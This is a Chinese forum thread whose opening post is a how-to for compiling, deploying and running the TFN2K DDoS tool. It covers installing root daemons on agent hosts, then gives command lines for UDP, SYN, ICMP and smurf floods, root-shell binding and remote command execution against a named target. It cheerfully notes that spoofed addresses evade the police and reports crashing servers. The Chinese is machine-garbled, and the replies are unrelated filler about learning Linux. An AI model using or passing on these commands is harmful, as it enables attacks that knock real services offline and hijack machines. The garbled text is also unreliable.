仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 422|回复: 8
打印 上一主题 下一主题

[其他Linux] 来看看:Linux对Windows举行DDOS打击举措

[复制链接]
山那边是海 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 17:21:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
vim除非你打算真正的学好linux,或者说打算长久时间学习他,而且肯花大量时间vim,否则,最好别碰
起首说我们用来打击的客户机和服务器的设置办法,利用当下最着名的REDHATLINUX举行测试,本次打击测试我利用的是FEDORACORE3,软件用的是最着名的DDOS。
  空话不说了,入手下手设置服务器。
  解压tar-zxvftfn2k.tgz
  一.安装TFN2K
  TFN2K为开放原代码的软件,以是必要我们举行编译,这个不必说了,编译应当城市的吧,但有几个中央是必须注重的,由于利用分歧版本和厂商的LINUX必要分歧的设置。
  先修正src/ip.h
  正文失落以下部分,不然编译堕落。/*structin_addr
   {
  unsignedlongints_addr;
  };*/
  
  然后make举行编译
  编译时会提醒你输出服务器端举行暗码设置8-32位,(打击的时分必要输出暗码)编译后会呈现两个新的实行文件td和tfn,个中td是保卫历程,也是客户机的利用历程。而tfn是服务器把持历程,假如想打击他人就必须先起动td这个历程,然后再运转服务器历程,不然攻击有效,变动暗码能够实行mkpass举行变动。最初在一切的客户机中安装并运转td(必要ROOT权限),而且在服务器上创建一个文本文件,文件中纪录一切的客户机IP地点(用VI编纂一个便可行了),格局为:
  192.168.0.1
  192.168.0.2
  192.168.0.3
  IP
  IP
  ……
  然后在主服务器上运转./tfn
  二.打击
  ./tfn间接回车人人能够看到一些参数,英文好的伴侣估量不必我来多讲了:)
  格局./tfn<参数>
  无用的参数我们不提,我们来讲打击用的
  -f这个参数前面跟方才所写的文本文件名,就是真正完成DDOS打击,而不是DOS
  -hDOS打击,也就是单机,一对一的打击前面跟一个主机或IP地点
  -p前面指定一个端口,不必说了
  -c最关头的参数,一共有11个选相
  0-中断打击,发善心用的
  1-反棍骗品级设定,由于TFN这个工具在打击的时分所收回的数据包是带有源地点的,可是源地点是随机的,也就是说地点不是你自给的,以是不必忧虑差人抓,哈哈
  2-改编数据包的包尺寸:缺省的ICMP/8,smurf,udp打击缺省利用最小包。你能够经由过程改动每一个包的无效载荷的字节增添它的巨细。
  3 - 绑定rootshell:启动一个会话服务,然后你毗连一个指定端口就能够失掉一个rootshell。
  4 - UDP大水打击:这个打击是使用如许一个现实:每一个udp包被送往一个封闭的端口,如许就会有一个ICMP不成抵达的信息前往,增添了打击的才能。
  5 - SYN大水打击:这个打击有纪律的送子虚的毗连哀求。了局会是方针端口回绝服务,添瞒TCP毗连表,经由过程对不存在主机的TCP/RST呼应增添打击潜力,是尺度的回绝服务打击.
  6 - ICMP呼应(ping)打击:这个打击发送子虚地点的ping哀求,方针主时机回送不异巨细的呼应包。
  7-SMURF打击:用方针主机的地点发送ping哀求以播送扩展,如许方针主机将失掉复兴一个多倍的复兴。
  8 - MIX打击:依照1:1:1的干系瓜代的发送udp,syn,icmp包,如许就能够凑合路由器,别的包转发设备,NIDS,sniffers等,轮替轰炸:)
  9 -TARGA3打击
  10 - 远程命令实行,这个参数是TFN的附加功效,实在TFN的打击不单单是DOS,还能够远程的举行明令把持,如:
  ./tfn-fhostext-c10-i"mkdir/root/edison"在一切的HOST上root家目次创建edison,-i前面跟"命令"
  参数基础说完,上面打击
  ./tfn-fhostext-c4-iwww.xxx.com
  利用hostext文件中纪录的主机对163服务器举行UDP打击(一切的主机中必须已起动td历程)
  ./tfn-fhostext-c5-iwww.xxx.com-p80
  利用hostext文件中纪录的主机对163服务器举行TCP回绝服务打击(80打击WEB,其他不必说了)
  ./tfn-fhostext-c6-iwww.xxx.com
  利用hostext文件中纪录的主机对163服务器举行ICMP打击(PING打击,缓冲区溢出即刻逝世机)
  ./tfn-fhostext-c8-iwww.xxx.com
  利用hostext文件中纪录的主机对163服务器举行ICMP&TCP&UDP轮替打击(假如对方是sniffer必定哭逝世)
  ./tfn-fhostext-c0
  让所由主机中断打击
  基础说完,最初说说我的测试了局
  一对一打击,打击体例TCP毗连体例当地当地CPU13%被打击的服务器CPU利用率70%以上,并不时动摇
  二对一打击,打击体例TCP毗连体例当地当地单机CPU13%被打击的服务器CPU利用率100%
  五对一打击,打击体例TCP毗连体例当地当地单机CPU13%被打击的服务器逝世机.自己家里只要6台呆板,但假如再多点,几十台呆板,一样平常的团体服务器一定要逝世失落了
  一对一打击,打击体例ICMP毗连体例当地当地CPU18%被打击的服务器CPU利用率96%以上,并不时动摇二对一打击,打击体例ICMP毗连体例当地当地单机CPU18%被打击的服务器以经没法上彀,几近没法利用,半小时内逝世机.看来能力不小

</p>
有些人号称用过十几种甚至几十种linux,向人谈论起来头头是到,好像懂的很多。
柔情似水 该用户已被删除
沙发
发表于 2015-1-18 17:52:54 来自手机 | 只看该作者
以前觉得Linux就跟dos一样,全是用命令窗口,相对于窗口界面来说多麻烦呀。
山那边是海 该用户已被删除
板凳
 楼主| 发表于 2015-1-25 22:43:25 | 只看该作者
尽量不要提问纯属是扯蛋.学习Linux特别是自己一个人初学入手的时候没人教很困难.当然如果可以的话平时多去买些Linux书...对学习Linux很有帮助.
谁可相欹 该用户已被删除
地板
发表于 2015-2-4 13:01:15 | 只看该作者
老实说,第一个程序是在C中编译好的,调试好了才在Linux下运行,感觉用vi比较麻烦,因为有错了不能调试,只是提示错误。
精灵巫婆 该用户已被删除
5#
发表于 2015-2-9 22:48:32 | 只看该作者
其实当你安装了一个完整的Linux系统后其中已经包含了一个强大的帮助,只是可能你还没有发现和使用它们的技巧。
飘飘悠悠 该用户已被删除
6#
发表于 2015-2-28 03:29:27 | 只看该作者
其实当你安装了一个完整的Linux系统后其中已经包含了一个强大的帮助,只是可能你还没有发现和使用它们的技巧。
因胸联盟 该用户已被删除
7#
发表于 2015-3-9 20:29:37 | 只看该作者
Linux最大的特点就是其开源性,这一点是十分难得的,这也是它能够存在到现在的原因之一。
冷月葬花魂 该用户已被删除
8#
发表于 2015-3-17 01:09:18 | 只看该作者
熟读Linux系统有关知识,如系统目录树,有关内容可购书阅读或搜索论坛。
简单生活 该用户已被删除
9#
发表于 2015-3-23 13:43:55 | 只看该作者
虽然大家都比较喜欢漂亮的mm,但是在学 linux 的过程中,还是要多和“男人”接触一下:P 遇到问题的时候,出来看说和上网查之外,就是要多用 linux 下的 man 命令找找帮助。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-24 04:01

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表